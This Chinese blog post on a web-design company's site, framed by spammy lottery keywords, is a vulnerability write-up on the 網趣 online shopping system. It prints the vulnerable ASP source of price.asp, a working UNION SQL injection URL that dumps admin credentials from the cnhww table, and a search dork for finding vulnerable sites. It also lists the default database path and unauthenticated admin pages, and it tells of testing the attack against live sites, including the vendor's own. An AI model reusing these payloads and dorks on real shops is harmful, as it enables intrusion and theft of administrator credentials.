青海網站建設、網絡推廣最好的公司--您身邊的網站建設專家,馬上拿起電話,聯系我們:0971-8235355   
黑龙江11选5预测网 黑龙江11选5预测网 |  公司簡介 |  網站建設 |  網絡推廣 |  空間租用 |  域名注冊 |  企業郵局 |  網絡安全 |  網站編程 |  客服中心 |  聯系我們 |  人才招聘
 
西寧威勢最新網站制做案例展示
Lastest Project
 
西寧網站建設  
當前位置為:黑龙江11选5预测网 >> 腳本安全 >> 正文  
[原創]網趣網上購物系統時尚版 V最新漏洞拿WEBSHELL

文章來源: 黑龙江11选5预测网     發布時間:2009-11-7    瀏覽次數:12818    tags:網趣 漏洞

網趣網上購物系統時尚版 V最新 

   今天周末,睡到中午才起床,剛上線,看到QQ好友輻射魚給我留言,找我測試腳本漏洞。

輻射魚 13:01:03
等我找個點. 
輻射魚 13:03:48
//www.ymbxx.icu/price.asp?anid=62%20and%20exists%20(select%20*%20from%20cnhww) 
輻射魚 13:04:41
 表cnhww.為啥不支持 order by 
輻射魚 13:05:06
//www.ymbxx.icu/price.asp?anid=62%20order%20by%201 
輻射魚 13:05:29
password/admin 

    隨后我手動測試了幾下,發現漏洞確實存在,我跟他要了源碼和數據庫,看完以后理解起來就不是很難了,因為源碼是這樣寫的:

price.asp

rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

自己構造語句:

//www.ymbxx.icu/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

之后成功暴出用戶名和密碼。

商品序號 商品名稱 會員價 當前庫存 規格 規格參數
weih**cheye 15 7a57a5a7438**aac 36 23 查看詳細
wei**cheye 15 b2ea44b2cf0**bdb 36 23 查看詳細
緯**業 15 88121ef9c5a**5f9 36 23 查看詳細

   上面信息因為包含敏感信息,所以馬賽克了一下,用*代替了部份,因為是幫忙測試,所以到此處后我就告一段落,之后輻射魚又將此過程總結了一下,寫了一篇文章,我直接貼上來,有興趣的自己研究吧!

網趣網上購物系統時尚版 V最新

源碼我大致看了下.前臺一般不存在什么注入.數據庫的默認后串為.asp,可以考慮在前臺注冊用戶用戶給數據庫里面插馬.

我的思路:.

 

1.       分析源碼.

2.       數據庫中插馬.

3.       尋找上傳之類的文件分析.

4.       后臺的利用分析.

 

…………………………………………

 

本地架設個iis.測試下看看.

 

 

我們隨便提交個id ‘看看存在不存在注入.

 

提交ID=XXX‘返回主頁.

 

Products.asp

 

<html>

<head>

<!--#include file="conn.asp"-->

<!--#include file="config.asp"-->

<!--#include file="./alipay_inc/myAlipay.asp"-->

<!--#include file="./alipay_inc/alipay_Config.asp"-->

<title><%=webname%>--商品詳細信息</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<meta name="description" content="網趣網上購物系統,網趣網上購物系統時尚版,網趣購物系統,網上購物系統,購物系統,網趣購物,商城源碼,網上商店,網上商店系統,域名注冊,虛擬主機,恒偉網絡">

<meta name="keywords" content="網趣網上購物系統,網趣網上購物系統時尚版,網趣購物系統,網上購物系統,購物系統,網趣購物,商城源碼,網上商店,網上商店系統,域名注冊,虛擬主機,恒偉網絡">

 

<link href="images/css.css" rel="stylesheet" type="text/css">

</head>

<script language="JavaScript">

       <!--

       function OpenNews()

       {

                     window.name = "news"

                     win = window.open('','newswin','left=110,width=600,height=420,scrollbars=1');

       }

       //-->

       </script>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" >

<%if IsNumeric(request.QueryString("id"))=False then

response.write("<script>alert(""非法訪問!"");location.href=""index.asp"";</script>")

response.end

end if

dim id

id=request.QueryString("id")

if not isinteger(id) then

response.write"<script>alert(""非法訪問!"");location.href=""index.asp"";</script>"

end if%>

<%dim bookid,action

bookid=request.QueryString("id")

action=request.QueryString("action")

if action="save" then

set rs=server.CreateObject("adodb.recordset")

rs.open "select * from review",conn,1,3

rs.addnew

rs("bookid")=bookid

rs("pingji")=request("pingji")

rs("pinglunname")=HTMLEncode2(trim(request("pinglunname")))

rs("pingluntitle")=HTMLEncode2(trim(request("pingluntitle")))

rs("pingluncontent")=HTMLEncode2(trim(request("pingluncontent")))

rs("ip")=Request.servervariables("REMOTE_ADDR")

rs("pinglundate")=now()

rs("shenhe")=0

rs.update

rs.close

set rs=nothing

set rs=server.CreateObject("adodb.recordset")

rs.open "select * from products where bookid="&bookid,conn,1,3

rs("pingji")=rs("pingji")+1

rs("pingjizong")=rs("pingjizong")+request("pingji")

rs.update

rs.close

set rs=nothing

response.Write "<script language=javascript>alert('您的評論已成功提交,待管理員審核!');history.go(-1);</script>"

response.End

end if

%>

有防注入.

都是session驗證,沒有cookie這條路子我也測試了.不行

 

繼續看代碼.

 

Price.asp

 

<!--#include file="conn.asp"-->

<!--#include file="config.asp"-->

<html>

<head>

 

<title><%=webname%></title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<meta name="description" content="<%=des%>">

<meta name="keywords" content="<%=keya%>">

…………省略

 

nd if

set rs=server.CreateObject("adodb.recordset")

if anid<>"" then

rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

else

select case selectm

case ""

rs.open "select * from products order by adddate desc",conn,1,1

case "0"

rs.open "select * from products order by adddate desc",conn,1,1

case "shopid"

 

 

end select

end if

if err.number<>0 then

response.write "暫無相關數據!"

end if

if rs.eof And rs.bof then

Response.Write "<p align='center'>暫無相關數據!</p>"

else

totalPut=rs.recordcount

if currentpage<1 then

currentpage=1

end if

if (currentpage-1)*MaxPerPage>totalput then

if (totalPut mod MaxPerPage)=0 then

currentpage= totalPut \ MaxPerPage

else

currentpage= totalPut \ MaxPerPage + 1

end if

end if

if currentPage=1 then

showContent

showpage totalput,MaxPerPage,"Price.asp"

else

if (currentPage-1)*MaxPerPage<totalPut then

rs.move  (currentPage-1)*MaxPerPage

dim shopmark

shopmark=rs.bookmark

showContent

showpage totalput,MaxPerPage,"Price.asp"

else

currentPage=1

showContent

showpage totalput,MaxPerPage,"Price.asp"

end if

end if

end if

sub showContent

dim i

i=0

%>

沒有防過濾.

Price.asp?anid=62;(提交查詢語句)--

/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

 

 

/admin/admin.asp

/admin/admin3.asp

 

<html><head><title>商城管理系統</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<link href="../images/css.css" rel="stylesheet" type="text/css">

</head>

<body>

<%

 

Dim theInstalledObjects(24)

沒有驗證可以直接訪問.

 

 

 

2.數據庫.

 

\cnhwwdata\cnhww.asp 默認的數據庫路徑.

 

思路: 如果數據庫路徑沒修改,可以考慮在前臺注冊用戶拿shell.

 

 

 

<%nodown%> 防下載表段.

 

Cnhww 后臺用戶表段.

 

User 前臺用戶表段.

 

這里不用說了吧.防下載表段在插到數據庫的第一個行.數據庫插馬這條路子就不走了.(前臺插入一句話也不會閉合)

 

 

1.       后臺拿shell.

 

沒有防過濾.

Price.asp?anid=62;(提交查詢語句)--

 

 

語句就不構造了.

查詢Cnhww 表里面的

Admin /password

后臺拿shell的方法

 

網趣網上購物系統時尚版

關鍵字

inurl:Price.asp?anid=

利用方法

/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

拿到官方網站去測試,結果發現用了通用防注入

以下是引用片段:
非法操作!系統做了如下記錄↓
操作IP:123.45.67.89

操作時間:2009-11-7 15:31:35
操作頁面:/fshop/products.asp
提交方式:GET
提交參數:id
提交數據:346 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from cnhww order by adddate desc

輻射魚接著測試,發現,官方將后臺刪除了,并且數據庫表名也改了,哈哈,我就不接著玩了。


上一篇:[原創]HI在線客服的一個漏洞
下一篇:本人N年前寫的文章,注入影子鷹
評論列表
正在加載評論……
  
評論   
呢  稱:
驗證碼: 若看不清請點擊更換!
內  容:
 
 
  在線洽談咨詢:
點擊這里,在線洽談   點擊這里,在線洽談   點擊這里,在線洽談
與我交談  與我交談 與我交談
乘車路線    匯款方式   加盟合作  人才招聘  
公司地址:青海省西寧市西關大街73號(三二四部隊招行所四樓)     青ICP備13000578號-1 公安機關備案號:63010402000123    
QQ:147399120    mail:[email protected]    電話: 13897410341    郵編:810000
© Copyright( 2008-2009) www.ymbxx.icu All Rights Reserved    版權所有:西寧威勢電子信息服務有限公司 未經書面制授權,請勿隨意轉載!
業務:青海網站制做、青海網站建設、青海網頁設計、西寧網站制做、西寧網站建設、青海域名注冊、青海網絡推廣、青海網站推廣、青??占渥庥?/a>、黑龙江11选5预测网、黑龙江11选5预测网、網絡安全